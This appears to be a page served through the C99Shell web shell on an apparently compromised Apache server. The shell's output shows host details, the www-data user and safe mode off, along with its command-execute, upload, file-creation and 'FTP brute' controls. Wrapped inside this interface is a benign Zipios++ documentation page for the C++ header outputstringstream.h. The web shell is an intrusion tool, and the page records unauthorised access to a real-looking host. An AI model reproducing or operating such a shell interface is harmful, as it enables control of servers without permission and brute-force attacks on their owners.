!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/doc/libzipios++-doc/html/   drwxr-xr-x
Free 13.09 GB of 57.97 GB (22.58%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     outputstringstream_8h_source.html (10.93 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Zipios++: outputstringstream.h Source File
Zipios++
outputstringstream.h
Go to the documentation of this file.
1 #ifndef OUTPUTSTRINGSTREAM_H
2 #define OUTPUTSTRINGSTREAM_H
3 
4 #include "zipios++/zipios-config.h"
5 
6 #include "zipios++/meta-iostreams.h"
7 #include <string>
8 
9 namespace zipios {
10 
11 #if defined (HAVE_STD_IOSTREAM) && defined (USE_STD_IOSTREAM)
12 
13 typedef std::ostringstream OutputStringStream ;
14 
15 #else
16 
24 class OutputStringStream : public ostrstream {
25 public:
26 
29  inline string str() {
30  *this << ends ; // null terminate ostrstream
31  string o_str( ostrstream::str() ) ;
32  freeze( 0 ) ;
33  return o_str ;
34  }
35 private:
36  // To avoid invoking such a member function in the base
37  // class if there is one!
38  string str() const ;
39 };
40 
41 #endif
42 
43 } // namespace
44 
45 
46 #endif
47 
52 /*
53  Zipios++ - a small C++ library that provides easy access to .zip files.
54  Copyright (C) 2000 Thomas Søndergaard
55 
56  This library is free software; you can redistribute it and/or
57  modify it under the terms of the GNU Lesser General Public
58  License as published by the Free Software Foundation; either
59  version 2 of the License, or (at your option) any later version.
60 
61  This library is distributed in the hope that it will be useful,
62  but WITHOUT ANY WARRANTY; without even the implied warranty of
63  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
64  Lesser General Public License for more details.
65 
66  You should have received a copy of the GNU Lesser General Public
67  License along with this library; if not, write to the Free Software
68  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
69 */
OutputStringStream is typedefed to ostringstream if sstream is part of the standard library (unless Z...
string str()
Specialization of ostrstream::str() that takes care of null-terminating the string and unfreezing the...

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0092 ]--